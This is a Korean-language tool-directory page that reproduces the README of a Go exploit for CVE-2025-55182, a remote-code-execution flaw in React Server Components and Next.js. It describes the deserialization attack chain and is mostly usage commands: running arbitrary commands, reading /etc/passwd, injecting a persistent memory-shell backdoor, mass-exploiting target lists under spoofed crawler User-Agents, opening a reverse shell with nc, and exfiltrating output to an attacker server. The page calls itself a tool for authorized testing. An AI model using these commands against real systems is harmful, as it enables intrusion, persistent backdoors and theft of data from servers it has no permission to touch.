Skip to content
KitploitKITPLOIT
도구블로그
Log in
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2025-55182-golang-PoC — CVE-2025-55182용 Go 기반 개념 증명으로, React Server Components의 치명적인 RCE 취약점입니다. 취약점 확인, 명령 실행, 메모리 셸 주입, 리버스 셸, 배치 스캔 및 프록시 지원을 통해 승인된 보안 테스트를 수행합니다. | Kitploit
도구/GitHubGitHub/keklick1337/cve-2025-55182-golang-poc
Vulnerability AnalysisExploitationWeb Application ExploitationPost-ExploitationPenetration TestingCommand and ControlRed TeamingRemote Access ToolPayload Development

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
GitHubkeklick1337/cve-2025-55182-golang-poc

CVE-2025-55182-golang-PoC

CVE-2025-55182용 Go 기반 개념 증명으로, React Server Components의 치명적인 RCE 취약점입니다. 취약점 확인, 명령 실행, 메모리 셸 주입, 리버스 셸, 배치 스캔 및 프록시 지원을 통해 승인된 보안 테스트를 수행합니다.

저장소 보기웹사이트
6199개월 전아직 검토되지 않음

CVE-2025-55182 React Server Components RCE - Go PoC

⚠️ 승인된 보안 테스트 전용 ⚠️

설명

CVE-2025-55182(CVE-2025-66478이라고도 함)는 React Server Components(Flight 프로토콜)의 심각한 원격 코드 실행 취약점입니다. 이 도구는 보안 연구 및 승인된 침투 테스트를 위한 PoC의 Go 구현체입니다.

영향을 받는 버전:

  • react-server-dom-webpack: 19.0.0 - 19.2.0
  • Next.js: 15.x (패치 전: 15.0.5, 15.1.9, 15.2.6, 15.3.6, 15.4.8, 15.5.7)
  • Next.js: 16.x (16.0.7 이전)
  • Next.js: 14.3.0-canary.77 및 이후 canary 버전

취약점 세부 정보

이 익스플로잇은 Flight 프로토콜 역직렬화의 프로토타입 오염을 활용합니다:

  1. $@ 역직렬화를 사용하여 Chunk 참조를 얻습니다
  2. Chunk.prototype.then을 루트 객체의 then 속성으로 배치합니다
  3. status를 RESOLVED_MODEL로 설정하여 제어된 가짜 chunk로 initializeModelChunk을 호출합니다
  4. 공격자 페이로드와 함께 response._formData.get을 호출하는 Blob 역직렬화를 트리거합니다
  5. 임의 코드 실행을 위해 response._formData.get을 Function 생성자로 설정합니다

기능

  • 전체 RCE 기능 - 출력이 포함된 임의 명령 실행
  • 취약점 확인 모드 - 악용 없는 안전한 탐지
  • Next.js 버전 감지 - 자동 버전 핑거프린팅
  • 메모리 셸 주입 - /exec?cmd=에 지속적인 백도어
  • 배치 스캐닝 - JSON 출력이 포함된 멀티스레드 스캐닝
  • 포괄적인 프록시 지원:
    • 인증 유무에 관계없는 SOCKS5
    • SOCKS4/SOCKS4a
    • 인증 유무에 관계없는 HTTP/HTTPS 프록시
  • 스텔스 모드 - 브라우저, 크롤러, 보안 User-Agent
  • 속도 제한 - 요청 간 구성 가능한 지연 시간
  • 리버스 셸 - mkfifo + nc (Alpine/busybox에서 작동)
  • 데이터 유출 - 공격자 서버로 명령 출력 POST 전송
  • 크로스 플랫폼 빌드 - 30개 이상의 OS/아키텍처 조합
  • JSON 출력 - 자동화를 위한 기계 판독 가능 결과

설치

사전 빌드된 바이너리

GitHub Releases에서 플랫폼에 맞는 최신 릴리스를 다운로드하세요.

사용 가능한 바이너리:

  • Linux: amd64, 386, arm, arm64, mips, mipsle, mips64, riscv64, ppc64, s390x
  • Windows: amd64, 386, arm64
  • macOS: amd64 (Intel), arm64 (Apple Silicon)
  • FreeBSD, OpenBSD, NetBSD: amd64, 386, arm, arm64
  • 그 외...

소스에서 빌드

# Clone repository
git clone https://github.com/keklick1337/CVE-2025-55182-golang-PoC.git
cd CVE-2025-55182-golang-PoC

# Build for current platform
go build -o cve-2025-55182 .

# Or build for all platforms
chmod +x build.sh
./build.sh

소스에서 빌드하기

./build.sh 실행 후, 바이너리는 지원되는 모든 플랫폼에 대해 build/ 디렉토리에서 사용할 수 있습니다.

사용법

기본 명령어

# Check single target for vulnerability
./cve-2025-55182 -u http://target:3000 --check

# Detect Next.js version
./cve-2025-55182 -u http://target:3000 --version-check

# Execute command with output
./cve-2025-55182 -u http://target:3000 -c "id"
./cve-2025-55182 -u http://target:3000 -c "cat /etc/passwd"

메모리 셸 (지속적 백도어)

# Inject memory shell (checks if already installed first)
./cve-2025-55182 -u http://target:3000 --memshell

# Test if memory shell is active
./cve-2025-55182 -u http://target:3000 --test-shell

# Execute command via memory shell
./cve-2025-55182 -u http://target:3000 --shell-exec "cat /etc/passwd"

# After injection, you can also use curl directly:
curl 'http://target:3000/exec?cmd=id'
curl 'http://target:3000/exec?cmd=whoami'

사용자 지정 헤더 및 SSL 우회

# Add custom headers (can be used multiple times)
./cve-2025-55182 -u http://target:3000 --check -H 'Authorization: Bearer token123'
./cve-2025-55182 -u http://target:3000 --check -H 'Host: example.com' -H 'X-Forwarded-For: 127.0.0.1'

# Skip SSL certificate verification (for self-signed certs)
./cve-2025-55182 -u https://target:3000 --check -k
./cve-2025-55182 -u https://target:3000 --check --insecure

# Combine with other options
./cve-2025-55182 -u https://target:3000 -c "id" -k -H 'Cookie: session=abc123' --proxy socks5://127.0.0.1:1080

프록시 지원

# SOCKS5 with authentication
./cve-2025-55182 -u http://target:3000 --check --proxy socks5://user:[email protected]:1080

# SOCKS5 without authentication
./cve-2025-55182 -u http://target:3000 --check --proxy socks5://127.0.0.1:1080

# SOCKS4 proxy
./cve-2025-55182 -u http://target:3000 --check --proxy socks4://127.0.0.1:1080

# HTTP proxy
./cve-2025-55182 -u http://target:3000 --check --proxy http://127.0.0.1:8080

배치 스캐닝

# Batch check from file
./cve-2025-55182 --urls targets.txt --check

# Batch scan with JSON output
./cve-2025-55182 --urls targets.txt --check --json -o results.json

# Batch scan with multiple threads and stealth
./cve-2025-55182 -f targets.txt --check --threads 20 --stealth crawler --delay 2s

# Save vulnerable targets to file
./cve-2025-55182 -f targets.txt --check -o vulnerable.txt

# Batch memory shell injection
./cve-2025-55182 --urls targets.txt --memshell --workers 10

# Batch command execution
./cve-2025-55182 --urls targets.txt -c "id" --threads 5

네트워크 데이터 유출

# Reverse shell (mkfifo + nc, works on Alpine)
./cve-2025-55182 -u http://target:3000 --revshell 10.0.0.1 4444

# Start listener on attacker machine first:
nc -lvnp 4444

# Exfiltrate command output via HTTP POST
./cve-2025-55182 -u http://target:3000 --exfil "cat /etc/passwd" 10.0.0.1 4444

# Start listener: nc -lvnp 4444

옵션

OptionDescription
-u, --url대상 URL (예: http://localhost:3000)
-f, --file대상 URL 목록이 포함된 파일 (줄당 하나)
--urls-f/--file의 별칭
-o, --output취약한 대상에 대한 출력 파일
--json결과를 JSON 형식으로 출력
-c, --command실행할 명령 (출력 포함)
--check취약점 확인
--version-checkNext.js 버전 감지
--proxy프록시 URL (socks5://user:pass@ip:port, socks4://ip:port, http://ip:port)
-H, --header사용자 지정 헤더 (여러 번 사용 가능)
-k, --insecureSSL/TLS 인증서 검증 건너뛰기
--stealth스텔스 모드: browser, crawler, security (기본값: browser)
--delay요청 간 지연 시간 (예: 2s, 500ms)
--variants철저한 확인을 위해 여러 페이로드 변형 사용
--memshell메모리 셸 주입 (지속적 백도어)
--test-shell메모리 셸 활성 여부 테스트
--shell-exec메모리 셸을 통한 명령 실행
--revshell IP PORT리버스 셸 설정
--exfil CMD IP PORT명령 실행 및 출력 POST 전송
-t, --timeout요청 제한 시간(초) (기본값: 15)
--threads동시 스레드 수 (기본값: 10)
--workers--threads의 별칭
--nocolor색상 출력 비활성화 (Windows/파이프용)
-h, --help도움말 메시지 표시
-v, --version버전 표시

프록시 유형

socks5://user:pass@ip:port  - SOCKS5 with authentication
socks5://ip:port            - SOCKS5 without authentication  
socks5h://ip:port           - SOCKS5 with remote DNS resolution
socks4://ip:port            - SOCKS4 proxy
socks4a://ip:port           - SOCKS4a proxy
http://user:pass@ip:port    - HTTP proxy with authentication
http://ip:port              - HTTP proxy without authentication
https://ip:port             - HTTPS proxy

스텔스 모드

ModeDescription
browser실제 브라우저 요청 모방 (Chrome, Firefox, Safari, Edge) - 기본값
crawler검색 엔진 크롤러 모방 (Googlebot, Bingbot, Baiduspider 등)
security보안 스캐너 User-Agent 사용 (Nessus, Nuclei)

메모리 셸

메모리 셸 기능은 다음을 수행하는 지속적인 백도어를 주입합니다:

  1. 먼저 확인 - 주입 전에 셸이 이미 설치되어 있는지 확인
  2. http.Server.prototype.emit 후킹 - 모든 HTTP 요청 가로채기
  3. /exec 엔드포인트 생성 - cmd 쿼리 매개변수 허용
  4. 재시작까지 유지 - 서버 메모리에 지속
# After injection:
curl 'http://target:3000/exec?cmd=id'
curl 'http://target:3000/exec?cmd=ls+-la'
curl 'http://target:3000/exec?cmd=cat+/etc/passwd'

프로젝트 구조

.
├── main.go                   # CLI entry point
├── pkg/
│   ├── colors/
│   │   └── colors.go         # Terminal colors with --nocolor support
│   ├── exploit/
│   │   └── exploit.go        # Core exploit logic, memory shell, version detection
│   ├── proxy/
│   │   └── proxy.go          # SOCKS4/5, HTTP proxy support
│   ├── scanner/
│   │   └── scanner.go        # Batch scanning with JSON output
│   └── stealth/
│       └── stealth.go        # User-Agent randomization
├── build.sh                  # Cross-platform build script
├── go.mod                    # Go module file
├── go.sum                    # Go dependencies
└── README.md                 # This file

크로스 플랫폼 빌드

build.sh 스크립트는 30개 이상의 플랫폼용으로 빌드합니다:

도구 다운로드